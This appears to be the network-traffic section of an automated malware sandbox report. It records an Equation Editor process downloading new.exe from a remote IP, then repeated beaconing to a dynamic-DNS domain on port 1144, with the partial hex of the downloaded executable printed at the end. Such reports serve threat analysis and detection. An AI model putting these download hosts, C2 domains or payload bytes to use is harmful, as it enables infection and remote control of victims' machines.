Jun 9, 2021 08:04:58.303929090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303931952 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303951025 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303966999 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303973913 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.303982019 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.303996086 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304007053 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304017067 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304027081 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304039001 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304065943 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304066896 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304075003 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304089069 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304100037 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304111004 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304114103 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304137945 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304142952 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304162979 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304167986 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304183006 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304204941 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304205894 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304217100 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304229975 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304240942 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304255009 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.304255962 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:58.304287910 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.305131912 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:58.945753098 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:05:29.047336102 CEST	49168	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:29.089657068 CEST	1144	49168	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:29.587378025 CEST	49168	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:29.629785061 CEST	1144	49168	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:30.133435965 CEST	49168	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:30.175765038 CEST	1144	49168	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:34.346832991 CEST	49169	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:34.389161110 CEST	1144	49169	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:34.891967058 CEST	49169	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:34.936095953 CEST	1144	49169	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:35.437943935 CEST	49169	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:35.482548952 CEST	1144	49169	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:39.610323906 CEST	49170	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:39.652671099 CEST	1144	49170	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:40.165189028 CEST	49170	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:40.207597971 CEST	1144	49170	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:40.711241961 CEST	49170	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:40.753782988 CEST	1144	49170	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:57.866432905 CEST	49171	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:57.908870935 CEST	1144	49171	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:58.418828964 CEST	49171	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:58.461251974 CEST	1144	49171	79.134.225.90	192.168.2.22
Jun 9, 2021 08:05:58.964834929 CEST	49171	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:05:59.007404089 CEST	1144	49171	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:03.081196070 CEST	49172	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:03.123518944 CEST	1144	49172	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:03.629585028 CEST	49172	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:03.671880960 CEST	1144	49172	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:04.175756931 CEST	49172	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:04.218075037 CEST	1144	49172	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:08.303108931 CEST	49173	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:08.347553968 CEST	1144	49173	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:08.856086969 CEST	49173	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:08.898592949 CEST	1144	49173	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:09.402173996 CEST	49173	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:09.444685936 CEST	1144	49173	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:26.455214024 CEST	49174	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:26.497498035 CEST	1144	49174	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:27.000433922 CEST	49174	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:27.045032978 CEST	1144	49174	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:27.546580076 CEST	49174	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:27.591068983 CEST	1144	49174	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:31.707674026 CEST	49175	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:31.752058029 CEST	1144	49175	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:32.258193970 CEST	49175	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:32.300652981 CEST	1144	49175	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:32.804261923 CEST	49175	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:32.846956968 CEST	1144	49175	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:36.924474001 CEST	49176	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:36.968739033 CEST	1144	49176	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:37.484741926 CEST	49176	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:37.529133081 CEST	1144	49176	79.134.225.90	192.168.2.22
Jun 9, 2021 08:06:38.046277046 CEST	49176	1144	192.168.2.22	79.134.225.90
Jun 9, 2021 08:06:38.088762999 CEST	1144	49176	79.134.225.90	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 08:05:28.973939896 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:29.020330906 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:34.258011103 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:34.302454948 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:34.302964926 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:34.345746040 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:39.508816957 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:39.553456068 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:39.564157009 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:39.609002113 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:44.790477991 CEST	61200	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:44.835094929 CEST	53	61200	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:44.879162073 CEST	49548	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:05:44.921695948 CEST	53	49548	8.8.4.4	192.168.2.22
Jun 9, 2021 08:05:45.024209976 CEST	49548	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:05:45.068455935 CEST	53	49548	8.8.4.4	192.168.2.22
Jun 9, 2021 08:05:45.136424065 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:45.181301117 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:49.244317055 CEST	56009	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:49.287616968 CEST	53	56009	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:49.288036108 CEST	56009	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:49.332956076 CEST	53	56009	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:49.374538898 CEST	61865	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:05:49.419663906 CEST	53	61865	8.8.4.4	192.168.2.22
Jun 9, 2021 08:05:49.429322004 CEST	55171	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:49.472683907 CEST	53	55171	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:49.473159075 CEST	55171	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:49.518783092 CEST	53	55171	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:53.554864883 CEST	52496	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:53.599143982 CEST	53	52496	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:53.629894018 CEST	57564	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:05:53.672451019 CEST	53	57564	8.8.4.4	192.168.2.22
Jun 9, 2021 08:05:53.681068897 CEST	63009	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:53.725708961 CEST	53	63009	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:53.726066113 CEST	63009	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:53.769005060 CEST	53	63009	8.8.8.8	192.168.2.22
Jun 9, 2021 08:05:57.819849968 CEST	59319	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:05:57.864238024 CEST	53	59319	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:03.036978960 CEST	53070	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:03.079896927 CEST	53	53070	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:08.258384943 CEST	59770	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:08.301292896 CEST	53	59770	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:13.473875999 CEST	61523	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:13.516377926 CEST	53	61523	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:13.517004967 CEST	61523	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:13.559509993 CEST	53	61523	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:13.583936930 CEST	62791	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:06:13.628263950 CEST	53	62791	8.8.4.4	192.168.2.22
Jun 9, 2021 08:06:13.628712893 CEST	62791	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:06:13.671596050 CEST	53	62791	8.8.4.4	192.168.2.22
Jun 9, 2021 08:06:13.718298912 CEST	50667	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:13.761213064 CEST	53	50667	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:17.805857897 CEST	54129	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:17.850658894 CEST	53	54129	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:17.881568909 CEST	65329	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:06:17.925237894 CEST	53	65329	8.8.4.4	192.168.2.22
Jun 9, 2021 08:06:17.931976080 CEST	60718	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:17.976290941 CEST	53	60718	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:17.976998091 CEST	60718	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:18.019859076 CEST	53	60718	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:22.055557013 CEST	49157	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:22.098540068 CEST	53	49157	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:22.135066032 CEST	57391	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:06:22.178117037 CEST	53	57391	8.8.4.4	192.168.2.22
Jun 9, 2021 08:06:22.270802021 CEST	61858	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:22.313879013 CEST	53	61858	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:26.361294031 CEST	62500	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:26.405859947 CEST	53	62500	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:26.406435013 CEST	62500	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:26.453803062 CEST	53	62500	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:31.619246006 CEST	51652	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:31.662369013 CEST	53	51652	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:31.662908077 CEST	51652	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:31.705940962 CEST	53	51652	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:36.878632069 CEST	62762	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:36.923249960 CEST	53	62762	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:42.094835997 CEST	56905	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:42.137829065 CEST	53	56905	8.8.8.8	192.168.2.22
Jun 9, 2021 08:06:42.142875910 CEST	54609	53	192.168.2.22	8.8.4.4
Jun 9, 2021 08:06:42.190478086 CEST	53	54609	8.8.4.4	192.168.2.22
Jun 9, 2021 08:06:42.193797112 CEST	58101	53	192.168.2.22	8.8.8.8
Jun 9, 2021 08:06:42.237989902 CEST	53	58101	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 9, 2021 08:05:28.973939896 CEST	192.168.2.22	8.8.8.8	0x3a4c	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:34.258011103 CEST	192.168.2.22	8.8.8.8	0xb4c8	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:34.302964926 CEST	192.168.2.22	8.8.8.8	0xb4c8	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:39.508816957 CEST	192.168.2.22	8.8.8.8	0x2426	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:39.564157009 CEST	192.168.2.22	8.8.8.8	0x2426	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:44.790477991 CEST	192.168.2.22	8.8.8.8	0x325c	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:44.879162073 CEST	192.168.2.22	8.8.4.4	0x7905	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:45.024209976 CEST	192.168.2.22	8.8.4.4	0x7905	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:45.136424065 CEST	192.168.2.22	8.8.8.8	0xc2b2	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:49.244317055 CEST	192.168.2.22	8.8.8.8	0xa796	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:49.288036108 CEST	192.168.2.22	8.8.8.8	0xa796	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:49.374538898 CEST	192.168.2.22	8.8.4.4	0x7d97	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:49.429322004 CEST	192.168.2.22	8.8.8.8	0xd791	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:49.473159075 CEST	192.168.2.22	8.8.8.8	0xd791	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:53.554864883 CEST	192.168.2.22	8.8.8.8	0x9ffa	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:53.629894018 CEST	192.168.2.22	8.8.4.4	0xc765	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:53.681068897 CEST	192.168.2.22	8.8.8.8	0x4f70	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:53.726066113 CEST	192.168.2.22	8.8.8.8	0x4f70	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:57.819849968 CEST	192.168.2.22	8.8.8.8	0x27af	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:03.036978960 CEST	192.168.2.22	8.8.8.8	0x1e37	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:08.258384943 CEST	192.168.2.22	8.8.8.8	0x2457	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:13.473875999 CEST	192.168.2.22	8.8.8.8	0x876d	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:13.517004967 CEST	192.168.2.22	8.8.8.8	0x876d	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:13.583936930 CEST	192.168.2.22	8.8.4.4	0x9519	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:13.628712893 CEST	192.168.2.22	8.8.4.4	0x9519	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:13.718298912 CEST	192.168.2.22	8.8.8.8	0xd1b4	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:17.805857897 CEST	192.168.2.22	8.8.8.8	0x1ce0	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:17.881568909 CEST	192.168.2.22	8.8.4.4	0x5286	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:17.931976080 CEST	192.168.2.22	8.8.8.8	0x5ed5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:17.976998091 CEST	192.168.2.22	8.8.8.8	0x5ed5	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:22.055557013 CEST	192.168.2.22	8.8.8.8	0x352f	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:22.135066032 CEST	192.168.2.22	8.8.4.4	0x8423	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:22.270802021 CEST	192.168.2.22	8.8.8.8	0x64d	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:26.361294031 CEST	192.168.2.22	8.8.8.8	0xe85a	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:26.406435013 CEST	192.168.2.22	8.8.8.8	0xe85a	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:31.619246006 CEST	192.168.2.22	8.8.8.8	0xfcdf	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:31.662908077 CEST	192.168.2.22	8.8.8.8	0xfcdf	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:36.878632069 CEST	192.168.2.22	8.8.8.8	0xbf52	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:42.094835997 CEST	192.168.2.22	8.8.8.8	0xbf28	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:42.142875910 CEST	192.168.2.22	8.8.4.4	0x3a49	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:42.193797112 CEST	192.168.2.22	8.8.8.8	0x474a	Standard query (0)	wekeepworking12.sytes.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 9, 2021 08:05:29.020330906 CEST	8.8.8.8	192.168.2.22	0x3a4c	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:34.302454948 CEST	8.8.8.8	192.168.2.22	0xb4c8	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:34.345746040 CEST	8.8.8.8	192.168.2.22	0xb4c8	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:39.553456068 CEST	8.8.8.8	192.168.2.22	0x2426	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:39.609002113 CEST	8.8.8.8	192.168.2.22	0x2426	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:05:57.864238024 CEST	8.8.8.8	192.168.2.22	0x27af	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:03.079896927 CEST	8.8.8.8	192.168.2.22	0x1e37	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:08.301292896 CEST	8.8.8.8	192.168.2.22	0x2457	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:26.405859947 CEST	8.8.8.8	192.168.2.22	0xe85a	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:26.453803062 CEST	8.8.8.8	192.168.2.22	0xe85a	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:31.662369013 CEST	8.8.8.8	192.168.2.22	0xfcdf	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:31.705940962 CEST	8.8.8.8	192.168.2.22	0xfcdf	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 08:06:36.923249960 CEST	8.8.8.8	192.168.2.22	0xbf52	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.12.127.155

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	198.12.127.155	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2021 08:04:57.065510035 CEST	0	OUT	GET /new.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.127.155 Connection: Keep-Alive
Jun 9, 2021 08:04:57.205565929 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 09 Jun 2021 06:04:57 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 08 Jun 2021 22:22:11 GMT ETag: "b3400-5c44896d8ef42" Accept-Ranges: bytes Content-Length: 734208 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 00 00 45 02 00 00 00 20 00 00 00 05 00 00 00 38 1b 00 00 00 2a 38 fa ff ff ff 20 01 00 00 00 7e 71 00 00 04 3a d9 ff ff ff 26 38 cf ff ff ff 02 03 16 39 0c 00 00 00 26 26 38 00 00 00 00 38 d1 ff ff ff 7d 03 00 00 04 38 c8 